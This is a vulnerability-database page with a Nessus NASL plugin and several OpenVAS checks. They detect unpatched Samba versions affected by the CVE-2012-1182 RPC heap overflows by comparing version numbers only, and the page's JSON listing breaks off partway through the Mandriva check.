ID SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL Type nessus Reporter This script is Copyright (C) 2012-2018 Tenable Network Security, Inc. Modified 2018-11-15T00:00:00
Description
According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities.
An error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user.
Note that Nessus has not actually tried to exploit this issue or otherwise determine if one of the associated patches has been applied.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(58662);
script_version ("1.14");
script_cvs_date("Date: 2018/11/15 20:50:24");
script_cve_id("CVE-2012-1182");
script_bugtraq_id(52973);
script_xref(name:"ZDI", value:"ZDI-12-061");
script_xref(name:"ZDI", value:"ZDI-12-062");
script_xref(name:"ZDI", value:"ZDI-12-063");
script_xref(name:"ZDI", value:"ZDI-12-064");
script_xref(name:"ZDI", value:"ZDI-12-068");
script_xref(name:"ZDI", value:"ZDI-12-069");
script_xref(name:"ZDI", value:"ZDI-12-070");
script_xref(name:"ZDI", value:"ZDI-12-071");
script_xref(name:"ZDI", value:"ZDI-12-072");
script_name(english:"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows");
script_summary(english:"Checks version of Samba");
script_set_attribute(attribute:"synopsis", value:
"The remote Samba server is affected by multiple buffer overflow
vulnerabilities.");
script_set_attribute(attribute:"description", value:
"According to its banner, the version of Samba 3.x running on the
remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,
therefore, affected by multiple heap-based buffer overflow
vulnerabilities.
An error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling
code it generates to contain multiple heap-based buffer overflow
vulnerabilities. This generated code can allow a remote,
unauthenticated attacker to use malicious RPC calls to crash the
application and possibly execute arbitrary code as the root user.
Note that Nessus has not actually tried to exploit this issue or
otherwise determine if one of the associated patches has been
applied.");
script_set_attribute(attribute:"solution", value:
"Either install the appropriate patch referenced in the project's
advisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-061/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-062/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-063/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-064/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-068/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-069/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-070/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-071/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-072/");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/security/CVE-2012-1182.html");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/samba-3.6.4.html");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/samba-3.5.14.html");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/samba-3.4.16.html");
# Patch links
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/security.html");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/04/10");
script_set_attribute(attribute:"patch_publication_date", value:"2012/04/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/04/11");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:samba:samba");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.");
script_dependencies("smb_nativelanman.nasl");
script_require_keys("SMB/NativeLanManager", "SMB/samba", "Settings/ParanoidReport");
exit(0);
}
include("global_settings.inc");
include("audit.inc");
include("misc_func.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_kb_item("SMB/transport");
lanman = get_kb_item_or_exit("SMB/NativeLanManager");
if ("Samba " >!< lanman) exit(0, "The SMB service listening on port "+port+" is not running Samba.");
version = lanman - 'Samba ';
ver = split(version, sep:'.', keep:FALSE);
for (i=0; i<max_index(ver); i++)
ver[i] = int(ver[i]);
# Patches have been released for 3.x < 3.4, but
# those patches do not change the version number
if (
(ver[0] == 3 && ver[1] < 4) ||
(ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||
(ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||
(ver[0] == 3 && ver[1] == 6 && ver[2] < 4)
)
{
if (report_verbosity > 0)
{
report = '\n Installed version : ' + version +
'\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
else audit(AUDIT_INST_VER_NOT_VULN, "Samba", version);
{"openvas": [{"lastseen": "2018-01-06T13:07:07", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2012-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6349", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:864213", "href": "http://plugins.openvas.org/nasl.php?oid=864213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6349\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"samba4 on Fedora 15\";\ntag_insight = \"Samba 4 is the ambitious next version of the Samba suite that is being\n developed in parallel to the stable 3.0 series. The main emphasis in\n this branch is support for the Active Directory logon protocols used\n by Windows 2000 and above.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\");\n script_id(864213);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:46:43 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-6349\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6349\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~26.alpha11.fc15.6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870581", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870581\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:57:49", "description": "Check for the Version of samba", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for samba MDVSA-2012:055 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:831574", "href": "http://plugins.openvas.org/nasl.php?oid=831574", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for samba MDVSA-2012:055 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in samba:\n\n The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\n array length in a manner consistent with validation of array memory\n allocation, which allows remote attackers to execute arbitrary code\n via a crafted RPC call (CVE-2012-1182).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"samba on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:055\");\n script_id(831574);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:22 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2012:055\");\n script_name(\"Mandriva Update for samba MDVSA-2012:055 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 